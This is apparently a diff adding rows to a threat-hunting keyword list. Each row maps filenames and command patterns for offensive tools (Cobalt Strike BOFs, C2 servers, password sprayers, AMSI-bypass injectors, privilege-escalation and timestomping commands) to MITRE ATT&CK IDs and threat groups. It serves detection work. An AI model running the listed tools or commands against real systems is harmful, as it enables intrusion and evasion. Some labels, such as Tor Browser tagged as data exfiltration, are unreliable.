+"*token-vault.cna*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z"
+"*token-vault.x64.o*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z"
+"*token-vault.x86.o*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z"
+"*TokenViewer.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*tokyoneon/Chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*tomcarver16/ADSearch*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z"
+"*tomcat_mgr_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*tomcat-rootprivesc-deb.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*tomcatWarDeployer -v -x -p * -H * ","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*Tool-PassView*","offensive_tool_keyword","Tool-PassView","Password recovery or exploitation","T1003 - T1021 - T1056 - T1110 - T1212","TA0001 - 
TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/password_recovery_tools.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*tools/adfind*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*tools/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z"
+"*top100_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z"
+"*top1000_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a 
reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z"
+"*Top109Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z"
+"*Top12Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z"
+"*Top1575-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z"
+"*Top1pt6Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z"
+"*Top207-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z"
+"*Top29Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z"
+"*Top2Billion-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z"
+"*Top304Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z"
+"*Top353Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z"
+"*topotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z"
+"*topotam/PetitPotam*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z"
+"*tor_hiddenservices.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*tor_services.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
+"*TORAnonymizer.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
+"*TorBrowser-*macos_ALL.dmg*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*torbrowser-install-*_ALL.exe","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*torbrowser-install-win*.exe*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*tor-browser-linux*_ALL.tar.xz*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*torproject*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*torproject.org/dist/torbrowser/*.*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*--tor-proxy*--pwndb*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z"
+"*TorPylle*","offensive_tool_keyword","TorPylle","A Python / Scapy implementation of the OR (TOR) protocol.","T1573 - T1572 - T1553 - T1041 - T1090","TA0002 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/cea-sec/TorPylle","1","0","N/A","N/A","1","91","23","2021-10-03T18:08:41Z","2013-07-23T11:38:39Z"
+"*TorServiceSetup*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","0","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
+"*totally legit pdf.pdf*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
+"*toteslegit.ps1*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in 
golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z"
+"*touch -a*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*touch -m*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*touch -r *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*touch -t *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - 
T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*tplmap*","offensive_tool_keyword","tplmap","Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The sandbox break-out techniques came from James Ketts Server-Side Template Injection: RCE For The Modern Web App. other public researches [1] [2]. and original contributions to this tool It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python. Ruby. PHP. Java and generic unsandboxed template engines.","T1059 - T1210.001 - T1589 - T1175","TA0002 - TA0007 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/epinna/tplmap","1","0","N/A","N/A","10","3438","670","2023-08-31T14:59:40Z","2016-07-06T20:33:18Z"
+"*trailofbits/onesixtyone*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. 
Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z"
+"*trainr3kt/MemReader_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z"
+"*trainr3kt/Readfile_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z"
+"*traitor -a *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*traitor --any *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*traitor -e *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*traitor --exploit*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*traitor -p *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*Transfer done (but failed to open directory).*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
+"*tree_connect_andx_request*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*TrevorC2*","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","1","N/A","10","10","1100","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z"
+"*trevorproxy ssh*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z"
+"*trevorproxy 
subnet*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z"
+"*trevorsaudi/Mshikaki*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z"
